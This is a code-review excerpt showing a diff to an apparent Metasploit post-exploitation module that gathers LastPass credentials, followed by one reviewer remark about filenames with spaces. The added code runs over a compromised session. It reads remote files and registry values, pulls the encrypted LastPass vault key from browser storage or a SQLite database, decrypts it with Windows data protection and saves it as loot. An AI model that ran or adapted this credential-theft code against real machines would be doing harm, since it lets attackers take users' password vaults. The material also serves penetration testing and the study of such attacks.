modules/post/multi/gather/lastpass_creds.rb

```diff
@@ -242,72 +210,611 @@ def file_paths(path, browser, account)
+    return nil if data.nil?
+
+    loot_path = store_loot(
+      title,
+      type,
+      session,
+      data,
+      nil,
+      description
+    )
+    loot_path
+  end
+
+  # Reads a remote file and returns the data
+  def read_remote_file(path)
+    data = nil
+
     begin
-      decipher.update(Base64.decode64(encrypted_password)) + decipher.final
+      data = read_file(path)
+    rescue EOFError
+      vprint_error "Error reading file #{path} It could be empty"
+    end
+    data
+  end
+
+  def read_registry_key_value(key, value)
+    begin
+      root_key, base_key = session.sys.registry.splitkey(key)
+      reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
+      return nil unless reg_key
+      reg_value = reg_key.query_value(value)
+      return nil unless reg_value
     rescue
-      print_error "Password for #{email} could not be decrypted"
+      vprint_error "Error reading registry key #{key} and value #{value}"
+    end
+    reg_key.close if reg_key
+    return reg_value.blank? ? nil : reg_value.data
+  end
+
+  def extract_local_encrypted_vault_key(browser, username, lp_data)
+    if browser.match(/Firefox|IE/)
+      encrypted_key_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps"
+      encrypted_vault_key = read_remote_file(encrypted_key_path)
+      encrypted_vault_key = windows_unprotect(encrypted_vault_key) if encrypted_vault_key != nil && encrypted_vault_key.match(/^AQAAA.+/) # Verify Windows protection
+    else
+      db = SQLite3::Database.new(lp_data['lp_db_loot'])
+      result = db.execute(
+        "SELECT data FROM LastPassData " \
+        "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'key'"
+      )
+      encrypted_vault_key = result[0][0]
+    end
+
+    return encrypted_vault_key.blank? ? nil : encrypted_vault_key.split("\n")[0] # Return only the key, not the "lastpass rocks" part
+  end
+
+  # Returns OS separator in a session type agnostic way
+  def system_separator
+    return session.platform =~ /win/ ? '\\' : '/'
+  end
+
+  # Returns if file exists in a session type agnostic way
+  def file_exists?(path)
+    if session.type == "meterpreter"
+      return client.fs.file.exists?(path)
+    elsif session.type == "shell"
+      return session.shell_command("ls \"#{path}\"").strip == path.strip
+    else
+      print_error "Session type not recognized: #{session.type}"
+      return nil
+    end
+  end
+
+  # Return directory content in a session type agnostic way
+  def directory_entries(path)
+    if directory?(path)
+      if session.type == "meterpreter"
+        return client.fs.dir.entries(path)
+      elsif session.type == "shell"
+        return session.shell_command("ls \"#{path}\"").split
+      else
+        print_error "Session type not recognized: #{session.type}"
+        return nil
+      end
     end
```

Comment:
Ah, I meant to say `dir(path)`. The implementation here will return invalid output on directories containing filenames with spaces.